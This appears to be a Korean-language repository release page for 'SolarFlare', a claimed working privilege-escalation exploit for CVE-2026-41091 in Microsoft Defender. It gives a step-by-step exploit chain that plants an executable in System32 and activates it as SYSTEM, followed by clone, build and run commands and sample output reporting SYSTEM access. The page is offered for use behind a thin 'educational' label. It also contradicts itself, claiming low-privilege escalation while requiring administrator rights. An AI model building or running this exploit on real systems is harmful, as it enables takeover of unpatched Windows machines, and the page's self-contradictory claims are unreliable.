์—…๋ฐ์ดํŠธ๋กœ ๋Œ์•„๊ฐ€๊ธฐ
New releaseAug 20, 2026

CVE-2026-41091-PoC-Exploit Full-PoCv2

CVE-2026-41091 RedSun | Microsoft Defender LPE ์ต์Šคํ”Œ๋กœ์ž‡. ๋‚ฎ์€ ๊ถŒํ•œ์˜ ์‚ฌ์šฉ์ž๊ฐ€ Cloud Files API + NTFS ์ •์…˜ ํŠธ๋ฆญ์„ ํ†ตํ•ด NT AUTHORITY\SYSTEM ๊ถŒํ•œ์„ ํš๋“ํ•ฉ๋‹ˆ๋‹ค ๐Ÿ”ฅ. Defender๊ฐ€ SYSTEM ๊ถŒํ•œ์œผ๋กœ System32์— ์•…์„ฑ ํŽ˜์ด๋กœ๋“œ๋ฅผ ์“ฐ๋„๋ก ๊ฐ•์ œํ•ฉ๋‹ˆ๋‹ค. โš ๏ธ ์‹ค์ œ ํ™˜๊ฒฝ์—์„œ ํ™œ๋ฐœํžˆ ์•…์šฉ ์ค‘. CVSS 7.8. ํŒจ์น˜: Defender Engine 1.1.26040.8. ๐Ÿ›ก๏ธ ๊ต์œก์šฉ PoC ์ „์šฉ์ž…๋‹ˆ๋‹ค.

๊ณต์œ 

SolarFlare

โ˜€๏ธ CVE-2026-41091 - RedSun (SolarFlare) - Microsoft Defender LPE ์ต์Šคํ”Œ๋กœ์ž‡

C++ Windows License CVSS CISA KEV

Microsoft Defender ๋งํฌ ์ถ”์  ์ทจ์•ฝ์  - NT AUTHORITY\SYSTEM์œผ๋กœ์˜ ๋กœ์ปฌ ๊ถŒํ•œ ์ƒ์Šน

์ด ์ทจ์•ฝ์ ์€ "RedSun" ๐ŸŽฏ์œผ๋กœ ์•Œ๋ ค์ ธ ์žˆ์œผ๋ฉฐ, "SolarFlare"๋Š” ์ œ๊ฐ€ ๋งŒ๋“  ์ต์Šคํ”Œ๋กœ์ž‡์˜ ์ด๋ฆ„์ž…๋‹ˆ๋‹ค. โœ…

๐Ÿ“Œ ๊ฐœ์š”

์ด ์ €์žฅ์†Œ๋Š” Microsoft Defender(Microsoft Malware Protection Engine)์˜ ์‹ฌ๊ฐํ•œ ๋กœ์ปฌ ๊ถŒํ•œ ์ƒ์Šน ์ทจ์•ฝ์ ์ธ CVE-2026-41091์— ๋Œ€ํ•œ ์™„์ „ํžˆ ๋™์ž‘ํ•˜๋Š” ๊ฐœ๋… ์ฆ๋ช…(PoC) ์ต์Šคํ”Œ๋กœ์ž‡์„ ํฌํ•จํ•ฉ๋‹ˆ๋‹ค. ์ž˜๋ชป๋œ ๋งํฌ ํ™•์ธ(CWE-59)์„ ์•…์šฉํ•˜์—ฌ, ์ธ์ฆ๋œ ๋‚ฎ์€ ๊ถŒํ•œ์˜ ๊ณต๊ฒฉ์ž๊ฐ€ NT AUTHORITY\SYSTEM ๊ถŒํ•œ์„ ํš๋“ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

"RedSun" ๋˜๋Š” **"SolarFlare"**๋กœ๋„ ์•Œ๋ ค์ง„ ์ด ์ทจ์•ฝ์ ์€ ๊ณต๊ฒฉ์ž๊ฐ€ Cloud Files API(CfAPI)์™€ NTFS ์ ‘ํ•ฉ ์ง€์ ์„ ์‚ฌ์šฉํ•˜์—ฌ Microsoft Defender๋ฅผ ์†์—ฌ SYSTEM ๊ถŒํ•œ์œผ๋กœ ๋ณดํ˜ธ๋œ ์‹œ์Šคํ…œ ์œ„์น˜์— ์ž„์˜์˜ ํŒŒ์ผ์„ ์“ฐ๊ฒŒ ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค.

์ฐธ๊ณ : ์ด ์ €์žฅ์†Œ์—๋Š” ๋‘ ๊ฐ€์ง€ ๋ฒ„์ „์ด ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค:

  • basic_poc.cpp - ๋‹จ์ˆœํ™”๋œ ์•Œ๊ณ ๋ฆฌ์ฆ˜ ๋ฐ๋ชจ(๊ต์œก์šฉ)
  • full_poc.cpp - ๋ชจ๋“  ๊ธฐ๋Šฅ์„ ๊ฐ–์ถ˜ ์™„์ „ํ•œ ๋™์ž‘ ์ต์Šคํ”Œ๋กœ์ž‡

๐Ÿ”ฅ ์ฃผ์š” ๊ธฐ๋Šฅ

๋ฒ”์ฃผ๊ธฐ๋Šฅ
์•…์šฉโœ… SYSTEM์œผ๋กœ์˜ ๋กœ์ปฌ ๊ถŒํ•œ ์ƒ์Šน
โœ… Cloud Files API(CfAPI) ํ†ตํ•ฉ
โœ… ํด๋ผ์šฐ๋“œ ์ž๋ฆฌ ํ‘œ์‹œ์ž ์ƒ์„ฑ
โœ… NTFS ์ ‘ํ•ฉ ์ง€์  ๋ฆฌ๋””๋ ‰์…˜
๊ธฐ๋ฒ•โœ… ๋ฐฐ์น˜ Oplock ๋‚จ์šฉ
โœ… VSS ์Šค๋ƒ…์ƒท ๊ฐ์ง€
โœ… EICAR ํŠธ๋ฆฌ๊ฑฐ
โœ… COM ์„œ๋น„์Šค ํ™œ์„ฑํ™”
๋Œ€์ƒโœ… Microsoft Defender < 1.1.26040.8
โœ… Windows 10/11
โœ… Windows Server 2019/2022
์‚ฌ์šฉ์„ฑโœ… ์ƒ์„ธ ๋กœ๊น…
โœ… ์˜ค๋ฅ˜ ์ฒ˜๋ฆฌ
โœ… ์ž„์˜ ๋””๋ ‰ํ„ฐ๋ฆฌ ์ด๋ฆ„
โœ… ์ž๋™ ์ •๋ฆฌ

๐ŸŽฏ ์ทจ์•ฝ์  ์„ธ๋ถ€ ์ •๋ณด

์†์„ฑ๊ฐ’
CVE IDCVE-2026-41091
CVSS ์ ์ˆ˜7.8 (๋†’์Œ)
CVSS ๋ฒกํ„ฐAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
๊ณต๊ฒฉ ๋ฒกํ„ฐ๋กœ์ปฌ
ํ•„์š”ํ•œ ๊ถŒํ•œ๋‚ฎ์Œ
์‚ฌ์šฉ์ž ์ƒํ˜ธ์ž‘์šฉ์—†์Œ
์˜ํ–ฅSYSTEM ์ˆ˜์ค€ ์ฝ”๋“œ ์‹คํ–‰
CISA KEVโœ… ์˜ˆ (์‹ค์ œ ํ™˜๊ฒฝ์—์„œ ํ™œ๋ฐœํžˆ ์•…์šฉ๋จ)
ํŒจ์น˜ ์ œ๊ณตMicrosoft Malware Protection Engine 1.1.26040.8

๐Ÿ“ฆ ์˜ํ–ฅ๋ฐ›๋Š” ์ œํ’ˆ

์ œํ’ˆ์˜ํ–ฅ๋ฐ›๋Š” ๋ฒ„์ „์ˆ˜์ • ๋ฒ„์ „
Microsoft Malware Protection Engine< 1.1.26040.81.1.26040.8+
Microsoft Defender Antimalware Platform< 4.18.26040.74.18.26040.7+

๐Ÿ”ฌ ์ต์Šคํ”Œ๋กœ์ž‡ ์ฒด์ธ

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ SOLARFLARE EXPLOIT CHAIN                                                    โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                                                                              โ”‚
โ”‚ 1. Create Working Directory                                                 โ”‚
โ”‚    โ””โ”€> %TEMP%\SF-XXXX\                                                      โ”‚
โ”‚                                                                              โ”‚
โ”‚ 2. Trigger Defender with EICAR                                              โ”‚
โ”‚    โ””โ”€> Write reversed EICAR to bait file                                    โ”‚
โ”‚                                                                              โ”‚
โ”‚ 3. Wait for VSS Snapshot                                                    โ”‚
โ”‚    โ””โ”€> Detect Volume Shadow Copy creation                                   โ”‚
โ”‚                                                                              โ”‚
โ”‚ 4. Create First Batch Oplock                                                โ”‚
โ”‚    โ””โ”€> FSCTL_REQUEST_BATCH_OPLOCK on bait file                              โ”‚
โ”‚                                                                              โ”‚
โ”‚ 5. Wait for Oplock Break                                                    โ”‚
โ”‚    โ””โ”€> Acquire exclusive access                                             โ”‚
โ”‚                                                                              โ”‚
โ”‚ 6. Rename Directory                                                         โ”‚
โ”‚    โ””โ”€> Move original directory to .tmp                                      โ”‚
โ”‚                                                                              โ”‚
โ”‚ 7. Register Cloud Sync Root                                                 โ”‚
โ”‚    โ””โ”€> CfRegisterSyncRoot with Cloud Files API                              โ”‚
โ”‚                                                                              โ”‚
โ”‚ 8. Create Cloud Placeholder                                                 โ”‚
โ”‚    โ””โ”€> CfCreatePlaceholders for bait file                                   โ”‚
โ”‚                                                                              โ”‚
โ”‚ 9. Create Second Batch Oplock                                               โ”‚
โ”‚    โ””โ”€> FSCTL_REQUEST_BATCH_OPLOCK on cloud placeholder                      โ”‚
โ”‚                                                                              โ”‚
โ”‚ 10. Wait for Second Oplock Break                                            โ”‚
โ”‚     โ””โ”€> Acquire exclusive access                                            โ”‚
โ”‚                                                                              โ”‚
โ”‚ 11. Rename Cloud Directory                                                  โ”‚
โ”‚     โ””โ”€> Move cloud directory to .cloud.tmp                                  โ”‚
โ”‚                                                                              โ”‚
โ”‚ 12. Create NTFS Junction to System32                                        โ”‚
โ”‚     โ””โ”€> Redirect to C:\Windows\System32                                     โ”‚
โ”‚                                                                              โ”‚
โ”‚ 13. Copy Payload to System32                                                โ”‚
โ”‚     โ””โ”€> Copy bait file to System32 as TieringEngineService.exe              โ”‚
โ”‚                                                                              โ”‚
โ”‚ 14. Activate Service as SYSTEM                                              โ”‚
โ”‚     โ””โ”€> CoCreateInstance(StorageTiersManagement)                            โ”‚
โ”‚                                                                              โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

๐Ÿ“ฆ ์„ค์น˜

์‚ฌ์ „ ์š”๊ตฌ ์‚ฌํ•ญ

  • Windows 10/11 ๋˜๋Š” Windows Server 2019/2022
  • C++ ๋„๊ตฌ๊ฐ€ ํฌํ•จ๋œ Visual Studio 2019/2022
  • ๊ด€๋ฆฌ์ž ๊ถŒํ•œ(์‹คํ–‰์— ํ•„์š”)

๋นŒ๋“œ

# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit

# Build using Visual Studio Developer Command Prompt
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Or build basic version
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

๐Ÿ› ๏ธ ์‚ฌ์šฉ ๋ฐฉ๋ฒ•

์ „์ฒด ์ต์Šคํ”Œ๋กœ์ž‡(SYSTEM ๊ถŒํ•œ ์ƒ์Šน)

full_poc.exe

๊ธฐ๋ณธ ์•Œ๊ณ ๋ฆฌ์ฆ˜ ๋ฐ๋ชจ

basic_poc.exe

๐Ÿ“‹ ์˜ˆ์ œ ์ถœ๋ ฅ

์ „์ฒด ์ต์Šคํ”Œ๋กœ์ž‡ ์ถœ๋ ฅ

CVE-2026-41091 SolarFlare PoC
===============================
     by @tc4dy | CVSS 7.8
===============================

[*] SolarFlare exploit started.
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS snapshot detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Renaming cloud directory...
[+] Cloud directory renamed
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\TieringEngineService.exe
[*] Activating Storage Tiers Management service...
[+] Service activated as SYSTEM

[+] SYSTEM access obtained!

๊ธฐ๋ณธ PoC ์ถœ๋ ฅ

CVE-2026-41091 Basic PoC
========================================
  Algorithm Demonstration Only
========================================
[*] Starting exploit algorithm...
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\Payload.exe

[+] Algorithm demonstration completed!
[i] This is only the basic algorithm.
[i] For full SYSTEM privilege escalation,
[i] use full_poc.cpp with Cloud API and COM activation.

๐Ÿ”ง ๋นŒ๋“œ ์ง€์นจ

Visual Studio ์‚ฌ์šฉ

  1. VS 2022์šฉ ๊ฐœ๋ฐœ์ž ๋ช…๋ น ํ”„๋กฌํ”„ํŠธ๋ฅผ ์—ฝ๋‹ˆ๋‹ค.
  2. ์ต์Šคํ”Œ๋กœ์ž‡ ๋””๋ ‰ํ„ฐ๋ฆฌ๋กœ ์ด๋™ํ•ฉ๋‹ˆ๋‹ค.
  3. ๋‹ค์Œ์„ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค:
# Full exploit
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Basic PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

CMake ์‚ฌ์šฉ

cmake_minimum_required(VERSION 3.10)
project(SolarFlare)

set(CMAKE_CXX_STANDARD 17)

add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)

add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)

โš ๏ธ ์š”๊ตฌ ์‚ฌํ•ญ ๋ฐ ์ œํ•œ ์‚ฌํ•ญ

์š”๊ตฌ ์‚ฌํ•ญ์„ธ๋ถ€ ์‚ฌํ•ญ
OSWindows 10/11, Server 2019/2022
๊ถŒํ•œ๊ด€๋ฆฌ์ž(์‹คํ–‰์— ํ•„์š”)
DefenderMicrosoft Defender๊ฐ€ ํ™œ์„ฑํ™”๋˜์–ด ์žˆ์–ด์•ผ ํ•จ
์ธํ„ฐ๋„ทVSS ์Šค๋ƒ…์ƒท ๊ฐ์ง€์— ํ•„์š”
ํŒจ์น˜ํŒจ์น˜๋˜์ง€ ์•Š์€ ์‹œ์Šคํ…œ์—์„œ๋งŒ ๋™์ž‘
์•„ํ‚คํ…์ฒ˜x64 ์ „์šฉ

๐Ÿ”— ๊ด€๋ จ ์ต์Šคํ”Œ๋กœ์ž‡

์ œ ๋‹ค๋ฅธ ์ต์Šคํ”Œ๋กœ์ž‡ ์ €์žฅ์†Œ๋„ ํ™•์ธํ•ด ๋ณด์„ธ์š”:

์นดํ…Œ๊ณ ๋ฆฌ